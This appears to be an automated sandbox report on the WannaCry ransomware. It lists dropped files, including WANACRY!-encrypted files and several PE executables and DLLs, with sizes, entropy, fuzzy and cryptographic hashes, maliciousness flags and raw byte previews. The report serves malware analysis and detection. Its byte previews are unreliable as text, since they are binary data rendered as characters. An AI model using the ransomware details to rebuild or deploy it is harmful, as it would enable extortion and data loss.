                                                                              Preview:WANACRY!..........1...:."sX..."..?.&c.L.%.l....f.2....r\F..;.....c47.|.$J.....'...`>....x$OJ...z^.o.K.`.#.37.` .`...i...f....#=..VwN&3F...ZoFt.Jk.{...e.Q....l.....9.E..me..,.k.H...8u#...........J...Pm...2..6m.........A...1.I...,..(.B..UH0~~... .k.S'......................J.C......M-.J.^...&....b..p^K..........nL......Z.m....F|{..W.....n....q......BTk0..]....g.....^HH_..8--./...X..F..Z(......?..U.d<..I.....r|...>.B......)Dr.. ...Bqg..Qb...{...... ..P.G.b...CN.b.:.....R.o..'.C.}z/K...k...9^=.....|F.f{...rB.3.^M}.~O...Rz....B.%H.r'.y.....T...........s^.......t..AHY.)b....!YOSZ ..O...._.._.....Ie.t..p}.L9Gt...!1&suhA.W..N.+..B.@e..K.....1.S,4..+..mf.,.....(....M %.A.....SB`.4g$sT9...9....a*..b..x..$....B..+..w...M.~......3...|cf.*|..1L)..jZ.D(...|8..C...\.:.om....(...^._g..,.u..}.at.SrQ..G_..D=.p...K..)..g.dG7..7.z..ShU...\v...+..Rv.X...W).r~w.\..N...PD..P.a..@.....W9..+v2p0<D..>....J.-e.g. k..l|....#0...sIZjM.|..qN.....Qa....RK.....y.:.-.v.5..%
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.839370318921595
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkC4wtu411SgrHJWrZD/Qf1uOwQbUIm2tIPCWaBsdFfDBk:bkStVSjFTsNtm2tIan+K
                                                                              MD5:49104846E631E2A0653EFE98265F030B
                                                                              SHA1:DC0C7F2EF07E31704A5C98DEDD15A71335E52776
                                                                              SHA-256:871B000BFAEFAC9538468B388C98FFFC07F94AE117BD5C9D145EC4BF700D6B66
                                                                              SHA-512:6619F86D492DC66724047524E55EE9D804D8AFF3B724419CACAAA197135923A10F50208D22ABE25A1A1ABBCC6E6F75DF9C3A15DADAD92855D19B68C20785BF4F
                                                                              Malicious:false
                                                                              Preview:WANACRY!..........1...:."sX..."..?.&c.L.%.l....f.2....r\F..;.....c47.|.$J.....'...`>....x$OJ...z^.o.K.`.#.37.` .`...i...f....#=..VwN&3F...ZoFt.Jk.{...e.Q....l.....9.E..me..,.k.H...8u#...........J...Pm...2..6m.........A...1.I...,..(.B..UH0~~... .k.S'......................J.C......M-.J.^...&....b..p^K..........nL......Z.m....F|{..W.....n....q......BTk0..]....g.....^HH_..8--./...X..F..Z(......?..U.d<..I.....r|...>.B......)Dr.. ...Bqg..Qb...{...... ..P.G.b...CN.b.:.....R.o..'.C.}z/K...k...9^=.....|F.f{...rB.3.^M}.~O...Rz....B.%H.r'.y.....T...........s^.......t..AHY.)b....!YOSZ ..O...._.._.....Ie.t..p}.L9Gt...!1&suhA.W..N.+..B.@e..K.....1.S,4..+..mf.,.....(....M %.A.....SB`.4g$sT9...9....a*..b..x..$....B..+..w...M.~......3...|cf.*|..1L)..jZ.D(...|8..C...\.:.om....(...^._g..,.u..}.at.SrQ..G_..D=.p...K..)..g.dG7..7.z..ShU...\v...+..Rv.X...W).r~w.\..N...PD..P.a..@.....W9..+v2p0<D..>....J.-e.g. k..l|....#0...sIZjM.|..qN.....Qa....RK.....y.:.-.v.5..%
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1026
                                                                              Entropy (8bit):7.8242280281446455
                                                                              Encrypted:false
                                                                              SSDEEP:24:CNNjBWYgU3fgAhiMbzEc5vkrPAyUQslXXGOec9Jnt:cjgYgU4/MOPVUQslXX3/t
                                                                              MD5:D63F49243223284C70BFD6D5971846EA
                                                                              SHA1:B6FE7E9013E1133DE03D2D737596A5C8EB9960D0
                                                                              SHA-256:6CBF78AC2F561FFD7F2A65E5780D4864A5B7384687E780F5A7EC641A523C4847
                                                                              SHA-512:75DC8161488BDDDAE95630DB962CC40CF660E361EE01EEEC981180B41E0C4ADC59C25C01C10198D1AE3BFD0D1AEAF99B386D07086FDE35609A2991B73A774624
                                                                              Malicious:false
                                                                              Preview:..G.....4V.C..pn-...i+...)......O<E...&d......ksY$j.%.......@..v...Q..NS.....U*.. .;.S.;].U.....e/...-~....6... .<3pJ.u~..u.2.4.L%.4S..!..5.........7...S.r./,........;;S5..B.H.~.|s.A......F.6.E8..."......}.'%.|#.Z...}DR-r.......H%....(5T$....".g.v....R=.....$.4....D.Z;.z.....>.-.A..j.^/...l..z..E..OH....._d.@.^..Zh}g.f..';.i!,.'.m..b8M.v..QI.f....,>..9O.,../=..ME.......v.....]..<".?..q.N..D.~K..#..+v..)....t.s]G.o|+HT...NaW.ZJ.....j]-......b.....m.x...]'....bh.{L>;.n`...y.wdC.b.k.......J.h.ZV.(`.B9...D.?*.X..........5o.E.....(O.lj.6.gq.....8.s.'......M.<.b.~..".....[d.[ ..6..N...,l.b>d.......{...w...(.>.*qol..,J[\I..x...T...v.....$..5..;..w..]..4.t..n..d..A.&...$;>r/..x...S...B.....#..R...M..=zn.I.a....w....z......M....~.z...,....QI....>.?._...P..R.*....Ht..9....IB. .v:5...O.|2f....d.t....d......4"K...$..2v.>.l.....t....-.b....(...k..?.J..0.<....1......<..o.....6n..k.s........W......3...........u...jS...q..Y..;...@....u4.^5 .e.^R...FF..3..`;.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.857522418859428
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkS14HRiNs56gfKSuNgBN7Q27/odEO4TrAy7ws6lBQinP5z1c:bkSGHsa56YuWBN7Q2z0CrAy0VzTXc
                                                                              MD5:CBA182D4D875B8D03CA08517B297CA7C
                                                                              SHA1:D31CC75C3B8CD2D6DEE3ED62924D93C8E277E092
                                                                              SHA-256:62A4CD9F00BA493E2ACAA7E57599788F5D0101E27D8AB5AB798600E1E52F44F6
                                                                              SHA-512:D14C80D0B16C45FCC1CDB6D87EB553EC58235381AAB5FF6311F82F1ED37D0C53295AB19203E2C0A6BA87CDD63328BAA7C8E08F9FC6EF69E6FBFB206F7D81A3FD
                                                                              Malicious:false
                                                                              Preview:WANACRY!....$..R,.....pI....V.J..%.r`....b..s..B...E"}.H~\3r......o2..^.......^s.!|k8tvR...Rp.1...P.R)..)L.e....Y.iA.7...TaK..j.h[...kh......c..._..g'k...>..<.(...)y......d..2...e.r...a.b./....;....g.Ew......r..R..d9....-.u...k..J..B*E`..i>.5....._!."D............c~..^W.(.B.o.)Z.?D.!.b_.YR36)XQ....%.......s......e...q..............9V...g...6.-T...aG..h/.]~.D9..g.O...k.F..| ql...C0-.<.X...q..[.....n.:.+.L......xi...,d.Y.g..*.mp...V.ve...+H........N.(.%q....z9e.u..7...6...TB...K...EW>..k.Q%..G.+.l.....b...c+.u..oX.I.m.}...%.._..U?y..P..y.q...6....).H&.E..T.e..s.Ho_J.F.;....:).,...w @Z...\.0u.0E..\.C..L..g..T.z;.N..%*,....H.c.]......=Q~YdN%@..n......q*....V.G..U.M.F...I.....ip...S.v..yMJ.-F..j..f*....2..!+m.....B..>S .1.....<0.w.KTl6)...@S.../...m.t..D~....ZT....a\.....C....]M.L...e..b....PY.9XH%..b....A.....?.I..8b..7.l...8..`........I...xN.U.X.v{...-...TD..C2aC.{i.`e...O."[#B..E..n..2...3..K..r.X.8.O...G..F.........0#..\.,.....4.Zt.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.857522418859428
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkS14HRiNs56gfKSuNgBN7Q27/odEO4TrAy7ws6lBQinP5z1c:bkSGHsa56YuWBN7Q2z0CrAy0VzTXc
                                                                              MD5:CBA182D4D875B8D03CA08517B297CA7C
                                                                              SHA1:D31CC75C3B8CD2D6DEE3ED62924D93C8E277E092
                                                                              SHA-256:62A4CD9F00BA493E2ACAA7E57599788F5D0101E27D8AB5AB798600E1E52F44F6
                                                                              SHA-512:D14C80D0B16C45FCC1CDB6D87EB553EC58235381AAB5FF6311F82F1ED37D0C53295AB19203E2C0A6BA87CDD63328BAA7C8E08F9FC6EF69E6FBFB206F7D81A3FD
                                                                              Malicious:false
                                                                              Preview:WANACRY!....$..R,.....pI....V.J..%.r`....b..s..B...E"}.H~\3r......o2..^.......^s.!|k8tvR...Rp.1...P.R)..)L.e....Y.iA.7...TaK..j.h[...kh......c..._..g'k...>..<.(...)y......d..2...e.r...a.b./....;....g.Ew......r..R..d9....-.u...k..J..B*E`..i>.5....._!."D............c~..^W.(.B.o.)Z.?D.!.b_.YR36)XQ....%.......s......e...q..............9V...g...6.-T...aG..h/.]~.D9..g.O...k.F..| ql...C0-.<.X...q..[.....n.:.+.L......xi...,d.Y.g..*.mp...V.ve...+H........N.(.%q....z9e.u..7...6...TB...K...EW>..k.Q%..G.+.l.....b...c+.u..oX.I.m.}...%.._..U?y..P..y.q...6....).H&.E..T.e..s.Ho_J.F.;....:).,...w @Z...\.0u.0E..\.C..L..g..T.z;.N..%*,....H.c.]......=Q~YdN%@..n......q*....V.G..U.M.F...I.....ip...S.v..yMJ.-F..j..f*....2..!+m.....B..>S .1.....<0.w.KTl6)...@S.../...m.t..D~....ZT....a\.....C....]M.L...e..b....PY.9XH%..b....A.....?.I..8b..7.l...8..`........I...xN.U.X.v{...-...TD..C2aC.{i.`e...O."[#B..E..n..2...3..K..r.X.8.O...G..F.........0#..\.,.....4.Zt.
                                                                              Process:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):3197106
                                                                              Entropy (8bit):6.130063064844696
                                                                              Encrypted:false
                                                                              SSDEEP:98304:W5FYc9YouOquJVqrR1LlZRUT83DlJrqd+kq:WrjYouOquJgrlZ283xFqdq
                                                                              MD5:6ED47014C3BB259874D673FB3EAEDC85
                                                                              SHA1:C9B29BA7E8A97729C46143CC59332D7A7E9C1AD8
                                                                              SHA-256:58BE53D5012B3F45C1CA6F4897BECE4773EFBE1CCBF0BE460061C183EE14CA19
                                                                              SHA-512:3BC462D21BC762F6EEC3D23BB57E2BAF532807AB8B46FAB1FE38A841E5FDE81ED446E5305A78AD0D513D85419E6EC8C4B54985DA1D6B198ACB793230AEECD93E
                                                                              Malicious:true
                                                                              Antivirus:
                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......... ........!.....J... ..0...........`.....c..........................!.......0...@... .........................A....`..\.......<.......................h...................................................4c...............................text....H.......J..................`.p`.data...\d...`...f...P..............@.`..rdata..............................@.`@.bss.........p........................`..edata..A............V..............@.0@.idata..\....`......................@.0..CRT....,...........................@.0..tls.... ............ ..............@.0..rsrc...<............"..............@.0..reloc..h............(..............@.0B/4............ ......& .............@.@B/19.....;z.... ..|...( .............@..B/31.....`....@!....... .............@..B/45.....'....`!....... .............@..B/57...........!....... .............@.0B/70.....".....!....... .
                                                                              Process:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):719217
                                                                              Entropy (8bit):5.981438230537172
                                                                              Encrypted:false
                                                                              SSDEEP:6144:Ir2r5rFriGKbgai112Yq/5hcQTcGzAHzSHeqoftOEEdD4B2pihSpKOKm:naiV25uQTcGzAHOEW+Pzm
                                                                              MD5:90F50A285EFA5DD9C7FDDCE786BDEF25
                                                                              SHA1:54213DA21542E11D656BB65DB724105AFE8BE688
                                                                              SHA-256:77A250E81FDAF9A075B1244A9434C30BF449012C9B647B265FA81A7B0DB2513F
                                                                              SHA-512:746422BE51031CFA44DD9A6F3569306C34BBE8ABF9D2BD1DF139D9C938D0CBA095C0E05222FD08C8B6DEAEBEF5D3F87569B08FB3261A2D123D983517FB9F43AE
                                                                              Malicious:true
                                                                              Antivirus:
                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........t.........!.....@...................P.....e......................... ............@... ......................P..4H......................................t+.....................................................4............................text...T?.......@..................`.P`.data........P.......F..............@.`..rdata.. ....`.......J..............@.`@.bss.........0........................`..edata..4H...P...J..................@.0@.idata...............X..............@.0..CRT....,............h..............@.0..tls.... ............j..............@.0..reloc..t+.......,...l..............@.0B/4..................................@.@B/19.................................@..B/31......(.......*...|..............@..B/45.....1*... ...,..................@..B/57..........P......................@.0B/70.....v....p......................@..B/81....................
                                                                              Process:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):417759
                                                                              Entropy (8bit):5.853358941151938
                                                                              Encrypted:false
                                                                              SSDEEP:6144:g8r2rQrFr0XGXnZ7rvzRsiWqnjmYl5oHIH9A:gtXGJnvmiggA
                                                                              MD5:E5DF3824F2FCAD0C75FD601FCF37EE70
                                                                              SHA1:902418A4C5F3684DBA5E3246DE8C4E21C92D674E
                                                                              SHA-256:5CD126B4F8C77BDF0C5C980761A9C84411586951122131F13B0640DB83F792D8
                                                                              SHA-512:7E70889B46B54175C6BADA7F042F5730CA7E3D156F7B6711FDF453911E4F78D64A2A8769EB8F0E33E826A3B30E623B3CD4DAF899D9D74888BB3051F08CF34461
                                                                              Malicious:true
                                                                              Antivirus:
                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...........k......!.....`...4...............p.....b......................................@... ..............................@...............................p...............................`......................pB...............................text...._.......`..................`.P`.data........p.......f..............@.`..rdata..xr.......t...j..............@.`@.bss..................................`..edata...........0..................@.0@.idata.......@......................@.0..CRT....,....P......................@.0..tls.... ....`......................@.0..reloc.......p....... ..............@.0B/4......P............:..............@.@B/19.................>..............@..B/31..........0......................@..B/45..........P......................@..B/57.....<....p......................@.0B/70....."...........................@..B/81.....B...............
                                                                              Process:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):411369
                                                                              Entropy (8bit):5.909395689751269
                                                                              Encrypted:false
                                                                              SSDEEP:3072:oLQzG3CaDYuKCsZW9p2M8suCOSNKOM0LE5BtBsxvQkVgA2+FOYtLEgZEVPSm0aQY:oWHMACLoYaQ2bj+b0pJ
                                                                              MD5:6D6602388AB232CA9E8633462E683739
                                                                              SHA1:41072CC983568D8FEEB3E18C4B74440E9D44019A
                                                                              SHA-256:957D58061A42CA343064EC5FB0397950F52AEDF0594A18867D1339D5FBB12E7E
                                                                              SHA-512:B37BF121EA20FFC16AF040F8797C47FA8588834BC8A8115B45DB23EE5BFBEBCD1E226E9ACAB67B5EE43629A255FEA2CEEE4B3215332DD4127F187EE10244F1C3
                                                                              Malicious:true
                                                                              Antivirus:
                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........b.........!...............................l......................... ............@... .................................................................h...................................................L................................text...............................`.P`.data...............................@.`..rdata..DR... ...T..................@.`@.bss..................................`..edata...............T..............@.0@.idata...............p..............@.0..CRT....,...........................@.0..tls.... ...........................@.0..reloc..h...........................@.0B/4......8...........................@.@B/19.....W.... ......................@..B/31......%.......&...v..............@..B/45......&...0...(..................@..B/57..........`......................@.0B/70.....v....p......................@..B/81.....................
                                                                              Process:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):523262
                                                                              Entropy (8bit):5.7796587531390795
                                                                              Encrypted:false
                                                                              SSDEEP:6144:+ymz8Jq1p95avGpuO+/jUE8ADu2kNBMY8KHNygoB0+6tMqSsVwvN:+ylSZ+/jU7ynIK5Bb6Y
                                                                              MD5:73D4823075762EE2837950726BAA2AF9
                                                                              SHA1:EBCE3532ED94AD1DF43696632AB8CF8DA8B9E221
                                                                              SHA-256:9AECCF88253D4557A90793E22414868053CAAAB325842C0D7ACB0365E88CD53B
                                                                              SHA-512:8F4A65BD35ED69F331769AAF7505F76DD3C64F3FA05CF01D83431EC93A7B1331F3C818AC7008E65B6F1278D7E365ED5940C8C6B8502E77595E112F1FACA558B5
                                                                              Malicious:true
                                                                              Antivirus:
                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................!.....B...p...............`.....l.........................p......5(....@... .................................l....................................................................................................................text...X@.......B..................`.P`.data...8....`.......H..............@.0..rdata..<....p.......J..............@.`@.bss..................................`..edata...............Z..............@.0@.idata..l............f..............@.0..CRT....,............l..............@.0..tls.... ............n..............@.0..reloc...............p..............@.0B/4...................v..............@.@B/19.....Du.......v..................@..B/31....._o...p...p..................@..B/45..................l..............@..B/57.....|-...p......................@.0B/70.....J...........................@..B/81.................(..
                                                                              Process:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):92599
                                                                              Entropy (8bit):5.351249974009154
                                                                              Encrypted:false
                                                                              SSDEEP:1536:pEiL38qIuOFcErNX5d0tRCZiBP2DrbjgpfM2ydbv:aiLsqIHFPpdiU2q
                                                                              MD5:78581E243E2B41B17452DA8D0B5B2A48
                                                                              SHA1:EAEFB59C31CF07E60A98AF48C5348759586A61BB
                                                                              SHA-256:F28CAEBE9BC6AA5A72635ACB4F0E24500494E306D8E8B2279E7930981281683F
                                                                              SHA-512:332098113CE3F75CB20DC6E09F0D7BA03F13F5E26512D9F3BEE3042C51FBB01A5E4426C5E9A5308F7F805B084EFC94C28FC9426CE73AB8DFEE16AB39B3EFE02A
                                                                              Malicious:true
                                                                              Antivirus:
                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................!.........4...............0.....h................................<.....@... ......................`..i....p..................................@....................................................q...............................text...............................`.P`.data........0......."..............@.0..rdata..h....@.......$..............@.0@.bss.........P........................`..edata..i....`.......*..............@.0@.idata.......p.......,..............@.0..CRT....,............2..............@.0..tls.... ............4..............@.0..reloc..@............6..............@.0B/4...................:..............@.@B/19.....n|.......~...<..............@..B/31..........@......................@..B/45..........`......................@..B/57.....$...........................@.0B/70....."...........................@..B/81.....w...............
                                                                              Process:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):711459
                                                                              Entropy (8bit):5.884120014912355
                                                                              Encrypted:false
                                                                              SSDEEP:12288:hXhKnXI0Fkw80VEJtzwIA6Ouah6ESyrWlp36Z:thKnnkw80VEJtzwIAiazSxlFw
                                                                              MD5:A12C2040F6FDDD34E7ACB42F18DD6BDC
                                                                              SHA1:D7DB49F1A9870A4F52E1F31812938FDEA89E9444
                                                                              SHA-256:BD70BA598316980833F78B05F7EEAEF3E0F811A7C64196BF80901D155CB647C1
                                                                              SHA-512:FBE0970BCDFAA23AF624DAAD9917A030D8F0B10D38D3E9C7808A9FBC02912EE9DAED293DBDEA87AA90DC74470BC9B89CB6F2FE002393ECDA7B565307FFB7EC00
                                                                              Malicious:true
                                                                              Antivirus:
                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........p..y .....!..............................@n......................... .......4....@... ......................0..m)...`...4......<.......................85..................................................,g...............................text...............................`.P`.data....-..........................@.`..rdata.......@.......0..............@.`@.bss....d.... ........................`..edata..m)...0...*..................@.0@.idata...4...`...6...6..............@.0..CRT....,............l..............@.0..tls.... ............n..............@.0..rsrc...<............p..............@.0..reloc..85.......6...v..............@.0B/4..................................@.@B/19.....n|... ...~..................@..B/31..................,..............@..B/45..................B..............@..B/57.....$............T..............@.0B/70....."............\..
                                                                              Process:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                                              File Type:PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):3098624
                                                                              Entropy (8bit):6.512654975680739
                                                                              Encrypted:false
                                                                              SSDEEP:49152:5m9/gUvHrLaQ4Dt4PC+3xhae2cQX7E5zNvQIJZW/1h4+o4:MiuLSDt2C+3baAQX7ETQIr+h4+o
                                                                              MD5:FE7EB54691AD6E6AF77F8A9A0B6DE26D
                                                                              SHA1:53912D33BEC3375153B7E4E68B78D66DAB62671A
                                                                              SHA-256:E48673680746FBE027E8982F62A83C298D6FB46AD9243DE8E79B7E5A24DCD4EB
                                                                              SHA-512:8AC6DC5BB016AFC869FCBB713F6A14D3692E866B94F4F1EE83B09A7506A8CB58768BD47E081CF6E97B2DACF9F9A6A8CA240D7D20D0B67DBD33238CC861DEAE8F
                                                                              Malicious:true
                                                                              Antivirus:
                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....Cm8..................#..D/..H............#...@.........................../......./...@... .............................. ...2..............................D]...........................p.......................'...............................text...t.#.......#.................`.P`.data.........#.......#.............@.`..rdata........$.......$.............@.`@.bss....`G....-.......................`..idata...2... ...4....-.............@.0..CRT....4....`........-.............@.0..tls.... ....p........-.............@.0..reloc..D].......^....-.............@.0B................................................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                                              File Type:PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):3098624
                                                                              Entropy (8bit):6.512654975680739
                                                                              Encrypted:false
                                                                              SSDEEP:49152:5m9/gUvHrLaQ4Dt4PC+3xhae2cQX7E5zNvQIJZW/1h4+o4:MiuLSDt2C+3baAQX7ETQIr+h4+o
                                                                              MD5:FE7EB54691AD6E6AF77F8A9A0B6DE26D
                                                                              SHA1:53912D33BEC3375153B7E4E68B78D66DAB62671A
                                                                              SHA-256:E48673680746FBE027E8982F62A83C298D6FB46AD9243DE8E79B7E5A24DCD4EB
                                                                              SHA-512:8AC6DC5BB016AFC869FCBB713F6A14D3692E866B94F4F1EE83B09A7506A8CB58768BD47E081CF6E97B2DACF9F9A6A8CA240D7D20D0B67DBD33238CC861DEAE8F
                                                                              Malicious:true
                                                                              Antivirus:
                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....Cm8..................#..D/..H............#...@.........................../......./...@... .............................. ...2..............................D]...........................p.......................'...............................text...t.#.......#.................`.P`.data.........#.......#.............@.`..rdata........$.......$.............@.`@.bss....`G....-.......................`..idata...2... ...4....-.............@.0..CRT....4....`........-.............@.0..tls.... ....p........-.............@.0..reloc..D].......^....-.............@.0B................................................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):107520
                                                                              Entropy (8bit):6.440165833134522
                                                                              Encrypted:false
                                                                              SSDEEP:1536:NlN3sTKU7xniaO9ADje81EQ3aL8WNdUCqfRnToIfBoIONIOqbW+xCvETe:DpsmU7xaiDjeJL5qf5TBfgHqbdxCv6e
                                                                              MD5:FB072E9F69AFDB57179F59B512F828A4
                                                                              SHA1:FE71B70173E46EE4E3796DB9139F77DC32D2F846
                                                                              SHA-256:66D653397CBB2DBB397EB8421218E2C126B359A3B0DECC0F31E297DF099E1383
                                                                              SHA-512:9D157FECE0DC18AFE30097D9C4178AE147CC9D465A6F1D35778E1BFF1EFCA4734DD096E95D35FAEA32DA8D8B4560382338BA9C6C40F29047F1CC0954B27C64F8
                                                                              Malicious:true
                                                                              Antivirus:
                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#.....&...................@.....b......................... ...........@... .....................................................................................................................$................................text...d$.......&..................`.P`.data...X....@.......*..............@.0..rdata..pW...P...X...,..............@.`@.bss..................................`..edata..............................@.0@.idata..............................@.0..CRT....,...........................@.0..tls.... ...........................@.0..rsrc...............................@.0..reloc..............................@.0B................................................................................................................................................................................................................................
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1026
                                                                              Entropy (8bit):7.827509091256339
                                                                              Encrypted:false
                                                                              SSDEEP:24:rjPgzVU+0XLziEKXXDGd/POaO3DHpBeKGGGoHww8rjn:nPgz0iVXXDK+aOzHjEVw8rj
                                                                              MD5:C12E06DF2F7E070A25625639A182197A
                                                                              SHA1:4106C2E71BDD4E0D7880A793ABDD28838907BE95
                                                                              SHA-256:7B2F702F3328B37AAE706DB55AC751D5BAA43957E23C6DF6145988891C74BE77
                                                                              SHA-512:14BCFEA202D690AB625C0E186E9465B0B71CEF43AFDBF32197B5E29851171E41230DA4985A8C761C8065BAFFA1361B71F1D118E470E16324E8639A80DA421788
                                                                              Malicious:false
                                                                              Preview:.....j...fj$.B.....L.L.]vw:..o.;...._..!..y.,.*;X._.X^.}^IkFT./rF. S3..G....T..\..N.+..K.-._.4.P..L.J.E...........k]......;.ga.i......K..(..0....k...7...'.J..J..t2.-O..*\~.......L.nL$.y...O..j..~.}..Lf...6.......!.~...rJxvv.>.1Q.N5u}~...........T7|..b..K.*....H<...5b.t...r.D.!Or..].8k..p..:...d..C.}A}2..J.#..@7s.4...V......e.>....JHyz....n.X.P<..@6...I5...F...Y.x..G.t.._...EY?.*|.A.].J..(..n$z..J..>..#H.[.0..F.V...<K..N#...Ap^.x..e.......+.?...0..RI..C......o.....&Q.n?5..j`.(..S;Y....f.R.?.;..Zb...... .0...h....1...'z{..+of.].....G.....I.m...=~,mk.....D;................=.<5.l.N4_.+..D.'..._....q..q......%..\.._X..<.....(..V..{3...e+..9.yx..m$).*.......`..].i...mE...?..Z.q..]~v.c......+ .5i.@.0...........r....72.Y..H.7Mn.....tt..........Z.....-.`c.g...]......!I..m.P............g...Uz.u...!..'.}..\.P.n..;....K1.~.d..Sq....A....J1.}w<i.5.b..v.......&..O3.{F....&...t.g-...v....=G.....gm%..VI=.E..^..N.../g.,Qf..lo.*.^....L..[.I...
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.826921080946932
                                                                              Encrypted:false
                                                                              SSDEEP:24:bk6rjRdmG/Uosh3f6laACCV2jzf0ZQQZV9PnOEZ3hxpo8cYxf/+qDEK3aHl78W:bk6HLvUosRf4uY2j70ZlZzOK3LpgYpj0
                                                                              MD5:DC8879AC605B9C17C99D1CDDFB7559FF
                                                                              SHA1:386E9AD6A73C02BE6FF8A28AFFE366ABA903390A
                                                                              SHA-256:0D8700498A82030D53AD8CE5F526F52D7F559B3D5EB98CAAD444F4CFA629A898
                                                                              SHA-512:A6A40CE4C896B941A35DA87FD68C58BF8809FBF1A9C659A34E8EF66AB1C3D55129F910E30CF5C449CB2C874B024A0607861E4B58775BD87B73FABED7C7086D37
                                                                              Malicious:false
                                                                              Preview:WANACRY!.......f.]......NLv.7}..d.....W.<....{.>|.D. .|.'C..C..[3x.:.zR..n...p....8..:+>8nD.S\.5]...s.S(K.....8_.....6.*..By@k%. 4..@!Z.B.B..:"..v...C..B..W'...@gT|.s.."$+*2[.n....& ..D+u.*...*..C.&~B...}.........1n.v\..&..dU..2si.F}..f. .\hM<.0Z..q...#!...............;L.B. ..E.60......X.>e-..E.?.........!J[4...4.U.GS.O...|..._..?.S.l.j.....x...o..x...bU.[.)........B.._MS|.4.q+J....;..f....!c..G..a..P9.......u].sk..'.......#.....w.LU..g%.J;....&B.(#.R.i./..G..cY.F...d.......T.!g...w..\....O.M.B..@.yg)RboCG.!.i.0.......n.O0.D.$d.y.9.KT..:D.....4.G......n...S.=8dNp.&.G....3..e:..%._.i.[.8.7\.E(7;sp....-..........c..@..XhF......_.pk..........`T9|o.d...<".f$/.d&...r".....#...C.h.....\Z8....f..S.!...(x.2.!...._.|#....7..j?.Zu.<....9.."...Q..2R..."...O..[....)..|....mb.2....1q.X..a... .[}%C..EJ.:.....P._N...9Kkk..xu.$..K...!.......C...x]z.b..S.b*%...1.........l...\....9.>i>...&...gm...}M.{.V..\!...(D...k.EkxJk..t......g5.&.s{^|. .....h/F..M.yj...k|.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.826921080946932
                                                                              Encrypted:false
                                                                              SSDEEP:24:bk6rjRdmG/Uosh3f6laACCV2jzf0ZQQZV9PnOEZ3hxpo8cYxf/+qDEK3aHl78W:bk6HLvUosRf4uY2j70ZlZzOK3LpgYpj0
                                                                              MD5:DC8879AC605B9C17C99D1CDDFB7559FF
                                                                              SHA1:386E9AD6A73C02BE6FF8A28AFFE366ABA903390A
                                                                              SHA-256:0D8700498A82030D53AD8CE5F526F52D7F559B3D5EB98CAAD444F4CFA629A898
